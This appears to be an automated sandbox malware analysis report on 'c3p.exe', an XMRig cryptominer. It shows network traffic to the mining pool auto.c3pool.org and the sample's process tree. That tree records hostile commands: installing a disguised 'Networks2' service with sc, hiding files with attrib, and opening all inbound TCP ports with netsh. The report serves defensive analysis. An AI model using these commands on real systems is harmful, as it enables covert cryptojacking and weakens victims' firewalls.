RT_ICON	0x5222c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Chinese	China	0.4703757225433526
RT_ICON	0x52794	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Chinese	China	0.4986559139784946
RT_ICON	0x52a7c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Chinese	China	0.4444945848375451
RT_DIALOG	0x53324	0x176	data	Chinese	China	0.6898395721925134
RT_DIALOG	0x5349c	0xd6	data	Chinese	China	0.6962616822429907
RT_DIALOG	0x53574	0xba	data	Chinese	China	0.7204301075268817
RT_DIALOG	0x53630	0x102	data	Chinese	China	0.6201550387596899
RT_DIALOG	0x53734	0x286	data	Chinese	China	0.4953560371517028
RT_DIALOG	0x539bc	0x1ce	data	Chinese	China	0.6645021645021645
RT_STRING	0x53b8c	0xb6	data	Chinese	China	0.7472527472527473
RT_STRING	0x53c44	0xd6	data	Chinese	China	0.6962616822429907
RT_STRING	0x53d1c	0xca	data	Chinese	China	0.7920792079207921
RT_STRING	0x53de8	0x74	data	Chinese	China	0.9137931034482759
RT_STRING	0x53e5c	0x282	data	Chinese	China	0.6417445482866043
RT_STRING	0x540e0	0x94	data	Chinese	China	0.777027027027027
RT_STRING	0x54174	0x78	data	Chinese	China	0.9083333333333333
RT_STRING	0x541ec	0x64	data	Chinese	China	0.63
RT_STRING	0x54250	0x4a	data	Chinese	China	0.7837837837837838
RT_GROUP_ICON	0x5429c	0x3e	data	Chinese	China	0.8387096774193549
RT_MANIFEST	0x542dc	0x6ca	XML 1.0 document, ASCII text, with CRLF line terminators	Chinese	China	0.4090909090909091

Imports

DLL	Import
COMCTL32.dll	InitCommonControlsEx
SHLWAPI.dll	SHAutoComplete
KERNEL32.dll	FindClose, FindNextFileW, FindFirstFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, GetModuleFileNameW, FindResourceW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCurrentProcessId, GetLocaleInfoW, GetNumberFormatW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, WaitForSingleObject, GetDateFormatW, GetTimeFormatW, FileTimeToSystemTime, FileTimeToLocalFileTime, GetExitCodeProcess, GetTempPathW, MoveFileExW, UnmapViewOfFile, Sleep, MapViewOfFile, GetCommandLineW, CreateFileMappingW, GetTickCount, OpenFileMappingW, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateThread, GetProcessAffinityMask, CreateEventW, CreateSemaphoreW, ReleaseSemaphore, ResetEvent, SetEvent, SetThreadPriority, SystemTimeToFileTime, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, LocalFileTimeToFileTime, WideCharToMultiByte, MultiByteToWideChar, CompareStringW, IsDBCSLeadByte, SetFileTime, SetFileAttributesW, SetCurrentDirectoryW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoA, GetStringTypeW, GetStringTypeA, LoadLibraryA, GetConsoleMode, GetConsoleCP, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleHandleA, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetModuleFileNameA, ExitProcess, HeapSize, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualAlloc, VirtualFree, HeapCreate, InterlockedDecrement, GetCurrentThreadId, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, RaiseException, GetFileAttributesW, FlushFileBuffers, ReadFile, GetFileType, SetEndOfFile, SetFilePointer, WriteFile, GetStdHandle, GetLongPathNameW, GetShortPathNameW, GlobalAlloc, MoveFileW, CreateFileW, CreateDirectoryW, DeviceIoControl, RemoveDirectoryW, DeleteFileW, CreateHardLinkW, GetCurrentProcess, CloseHandle, SetLastError, GetLastError, CreateFileA, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind
USER32.dll	EnableWindow, GetDlgItem, ShowWindow, SetWindowLongW, GetDC, ReleaseDC, FindWindowExW, GetParent, MapWindowPoints, CreateWindowExW, UpdateWindow, LoadCursorW, RegisterClassExW, DefWindowProcW, DestroyWindow, CopyRect, IsWindow, CharUpperW, OemToCharBuffA, LoadIconW, LoadBitmapW, PostMessageW, GetSysColor, SetForegroundWindow, MessageBoxW, WaitForInputIdle, IsWindowVisible, DialogBoxParamW, DestroyIcon, SetFocus, GetClassNameW, SendDlgItemMessageW, EndDialog, GetDlgItemTextW, SetDlgItemTextW, wvsprintfW, SendMessageW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadStringW, GetWindowRect, GetClientRect, SetWindowPos, GetWindowTextW, SetWindowTextW, GetSystemMetrics, GetWindow, GetWindowLongW
GDI32.dll	GetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteDC, GetObjectW, DeleteObject, CreateDIBSection
COMDLG32.dll	GetSaveFileNameW, CommDlgExtendedError, GetOpenFileNameW
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegSetValueExW, RegCloseKey, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
SHELL32.dll	SHBrowseForFolderW, ShellExecuteExW, SHGetSpecialFolderLocation, SHFileOperationW, SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHGetFileInfoW
ole32.dll	CLSIDFromString, CoCreateInstance, OleInitialize, OleUninitialize, CreateStreamOnHGlobal
OLEAUT32.dll	VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 12, 2024 20:13:18.511502981 CEST	49706	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:18.511564016 CEST	443	49706	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:18.511650085 CEST	49706	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:18.511755943 CEST	49706	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:18.511765003 CEST	443	49706	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:18.511835098 CEST	443	49706	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:24.392054081 CEST	49707	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:24.392087936 CEST	443	49707	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:24.392178059 CEST	49707	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:24.392302036 CEST	49707	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:24.392312050 CEST	443	49707	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:24.392409086 CEST	443	49707	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:29.422645092 CEST	49708	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:29.422753096 CEST	443	49708	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:29.422852039 CEST	49708	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:29.422991037 CEST	49708	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:29.423037052 CEST	443	49708	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:29.423089981 CEST	443	49708	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:34.453936100 CEST	49714	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:34.453990936 CEST	443	49714	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:34.454066038 CEST	49714	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:34.454310894 CEST	49714	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:34.454325914 CEST	443	49714	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:34.454436064 CEST	443	49714	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:39.485135078 CEST	49715	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:39.485196114 CEST	443	49715	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:39.485424995 CEST	49715	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:39.485610962 CEST	49715	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:39.485630035 CEST	443	49715	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:39.485738993 CEST	443	49715	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:44.516472101 CEST	49716	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:44.516521931 CEST	443	49716	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:44.516717911 CEST	49716	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:44.516717911 CEST	49716	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:13:44.516746044 CEST	443	49716	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:44.517098904 CEST	443	49716	159.69.83.232	192.168.2.7
Jun 12, 2024 20:13:49.565572977 CEST	49717	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:49.565618038 CEST	443	49717	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:49.568552971 CEST	49717	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:49.568629980 CEST	49717	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:49.568636894 CEST	443	49717	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:49.568712950 CEST	443	49717	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:54.578974009 CEST	49718	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:54.579037905 CEST	443	49718	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:54.579226971 CEST	49718	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:54.579441071 CEST	49718	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:13:54.579461098 CEST	443	49718	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:54.579495907 CEST	443	49718	88.198.117.174	192.168.2.7
Jun 12, 2024 20:13:59.611083031 CEST	49719	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:59.611123085 CEST	443	49719	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:59.611203909 CEST	49719	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:59.611794949 CEST	49719	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:13:59.611808062 CEST	443	49719	195.201.97.156	192.168.2.7
Jun 12, 2024 20:13:59.611860991 CEST	443	49719	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:04.657594919 CEST	49720	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:04.657629967 CEST	443	49720	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:04.657797098 CEST	49720	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:04.657947063 CEST	49720	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:04.657953978 CEST	443	49720	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:04.658083916 CEST	443	49720	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:09.720516920 CEST	49721	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:09.720566988 CEST	443	49721	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:09.720654011 CEST	49721	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:09.722297907 CEST	49721	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:09.722310066 CEST	443	49721	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:09.722352982 CEST	443	49721	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:14.735251904 CEST	49723	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:14.735299110 CEST	443	49723	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:14.735390902 CEST	49723	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:14.735585928 CEST	49723	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:14.735601902 CEST	443	49723	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:14.735657930 CEST	443	49723	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:20.624991894 CEST	49724	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:20.625027895 CEST	443	49724	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:20.625169039 CEST	49724	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:20.625211954 CEST	49724	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:20.625217915 CEST	443	49724	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:20.625368118 CEST	443	49724	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:25.844717979 CEST	49725	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:25.844765902 CEST	443	49725	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:25.844918966 CEST	49725	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:25.845076084 CEST	49725	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:25.845094919 CEST	443	49725	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:25.845148087 CEST	443	49725	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:30.891609907 CEST	49726	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:30.891649008 CEST	443	49726	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:30.891761065 CEST	49726	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:30.891851902 CEST	49726	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:30.891860962 CEST	443	49726	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:30.891930103 CEST	443	49726	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:35.954736948 CEST	49727	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:35.954790115 CEST	443	49727	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:35.954859018 CEST	49727	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:35.955066919 CEST	49727	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:35.955079079 CEST	443	49727	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:35.955121994 CEST	443	49727	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:40.985461950 CEST	49728	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:40.985513926 CEST	443	49728	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:40.985631943 CEST	49728	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:40.985766888 CEST	49728	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:40.985776901 CEST	443	49728	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:40.985845089 CEST	443	49728	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:46.032216072 CEST	49729	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:46.032260895 CEST	443	49729	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:46.032365084 CEST	49729	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:46.032511950 CEST	49729	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:14:46.032525063 CEST	443	49729	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:46.032578945 CEST	443	49729	195.201.97.156	192.168.2.7
Jun 12, 2024 20:14:51.161463022 CEST	49730	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:51.161528111 CEST	443	49730	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:51.161628008 CEST	49730	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:51.161710978 CEST	49730	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:14:51.161719084 CEST	443	49730	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:51.161823988 CEST	443	49730	159.69.83.232	192.168.2.7
Jun 12, 2024 20:14:57.110472918 CEST	49731	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:57.110517025 CEST	443	49731	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:57.110651970 CEST	49731	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:57.111157894 CEST	49731	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:14:57.111169100 CEST	443	49731	88.198.117.174	192.168.2.7
Jun 12, 2024 20:14:57.111206055 CEST	443	49731	88.198.117.174	192.168.2.7
Jun 12, 2024 20:15:02.172905922 CEST	49732	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:15:02.172940016 CEST	443	49732	195.201.97.156	192.168.2.7
Jun 12, 2024 20:15:02.173054934 CEST	49732	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:15:02.173156023 CEST	49732	443	192.168.2.7	195.201.97.156
Jun 12, 2024 20:15:02.173173904 CEST	443	49732	195.201.97.156	192.168.2.7
Jun 12, 2024 20:15:02.173252106 CEST	443	49732	195.201.97.156	192.168.2.7
Jun 12, 2024 20:15:07.284236908 CEST	49733	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:07.284339905 CEST	443	49733	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:07.284427881 CEST	49733	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:07.284591913 CEST	49733	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:07.284616947 CEST	443	49733	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:07.284670115 CEST	443	49733	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:12.345000982 CEST	49734	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:12.345105886 CEST	443	49734	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:12.345194101 CEST	49734	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:12.345295906 CEST	49734	443	192.168.2.7	159.69.83.232
Jun 12, 2024 20:15:12.345318079 CEST	443	49734	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:12.345386028 CEST	443	49734	159.69.83.232	192.168.2.7
Jun 12, 2024 20:15:17.360820055 CEST	49735	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:15:17.360872030 CEST	443	49735	88.198.117.174	192.168.2.7
Jun 12, 2024 20:15:17.361011982 CEST	49735	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:15:17.361077070 CEST	49735	443	192.168.2.7	88.198.117.174
Jun 12, 2024 20:15:17.361085892 CEST	443	49735	88.198.117.174	192.168.2.7
Jun 12, 2024 20:15:17.361175060 CEST	443	49735	88.198.117.174	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 12, 2024 20:13:13.690016985 CEST	58696	53	192.168.2.7	1.1.1.1
Jun 12, 2024 20:13:18.413228035 CEST	59743	53	192.168.2.7	1.1.1.1
Jun 12, 2024 20:13:18.508968115 CEST	53	59743	1.1.1.1	192.168.2.7
Jun 12, 2024 20:13:49.554585934 CEST	59176	53	192.168.2.7	1.1.1.1
Jun 12, 2024 20:13:49.564718962 CEST	53	59176	1.1.1.1	192.168.2.7
Jun 12, 2024 20:14:19.783294916 CEST	61414	53	192.168.2.7	1.1.1.1
Jun 12, 2024 20:14:20.623894930 CEST	53	61414	1.1.1.1	192.168.2.7
Jun 12, 2024 20:14:51.048129082 CEST	56709	53	192.168.2.7	1.1.1.1
Jun 12, 2024 20:14:51.144081116 CEST	53	56709	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 12, 2024 20:13:13.690016985 CEST	192.168.2.7	1.1.1.1	0x2f65	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:18.413228035 CEST	192.168.2.7	1.1.1.1	0xf520	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:49.554585934 CEST	192.168.2.7	1.1.1.1	0xec8c	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:19.783294916 CEST	192.168.2.7	1.1.1.1	0x91d9	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:51.048129082 CEST	192.168.2.7	1.1.1.1	0xbf5f	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 12, 2024 20:13:13.698090076 CEST	1.1.1.1	192.168.2.7	0x2f65	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 12, 2024 20:13:18.508968115 CEST	1.1.1.1	192.168.2.7	0xf520	No error (0)	auto.c3pool.org		88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:18.508968115 CEST	1.1.1.1	192.168.2.7	0xf520	No error (0)	auto.c3pool.org		159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:18.508968115 CEST	1.1.1.1	192.168.2.7	0xf520	No error (0)	auto.c3pool.org		195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:49.564718962 CEST	1.1.1.1	192.168.2.7	0xec8c	No error (0)	auto.c3pool.org		88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:49.564718962 CEST	1.1.1.1	192.168.2.7	0xec8c	No error (0)	auto.c3pool.org		159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:13:49.564718962 CEST	1.1.1.1	192.168.2.7	0xec8c	No error (0)	auto.c3pool.org		195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:20.623894930 CEST	1.1.1.1	192.168.2.7	0x91d9	No error (0)	auto.c3pool.org		88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:20.623894930 CEST	1.1.1.1	192.168.2.7	0x91d9	No error (0)	auto.c3pool.org		159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:20.623894930 CEST	1.1.1.1	192.168.2.7	0x91d9	No error (0)	auto.c3pool.org		195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:51.144081116 CEST	1.1.1.1	192.168.2.7	0xbf5f	No error (0)	auto.c3pool.org		88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:51.144081116 CEST	1.1.1.1	192.168.2.7	0xbf5f	No error (0)	auto.c3pool.org		159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 12, 2024 20:14:51.144081116 CEST	1.1.1.1	192.168.2.7	0xbf5f	No error (0)	auto.c3pool.org		195.201.97.156	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	14:13:12
Start date:	12/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:13:13
Start date:	12/06/2024
Path:	C:\Users\user\Desktop\c3p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\c3p.exe"
Imagebase:	0x7ff75da10000
File size:	3'127'301 bytes
MD5 hash:	02AA02AEE2A6BD93A4A8F4941A0E6310
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:13:15
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:13:15
Start date:	12/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:13:15
Start date:	12/06/2024
Path:	C:\Windows\debug\c3p\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe
Imagebase:	0x400000
File size:	294'912 bytes
MD5 hash:	D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:13:15
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc config "Networks2" DisplayName= "Networksrs2"
Imagebase:	0x500000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:13:15
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc description "Networks2" "Microsoft Windows Networks"
Imagebase:	0x500000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc start "Networks2"
Imagebase:	0xaf0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\debug\c3p\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\WINDOWS\Debug\c3p\svchost.exe
Imagebase:	0x400000
File size:	294'912 bytes
MD5 hash:	D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib C:\Windows\debug\c3p +h +a
Imagebase:	0xab0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib C:\Windows\debug\c3p\*.json +h +a +s +r
Imagebase:	0xab0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\attrib.exe
Wow64 process (32bit):	true
Commandline:	attrib C:\Windows\debug\c3p\*.exe +h +a +s +r
Imagebase:	0xab0000
File size:	19'456 bytes
MD5 hash:	0E938DD280E83B1596EC6AA48729C2B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
Imagebase:	0x1770000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:13:16
Start date:	12/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
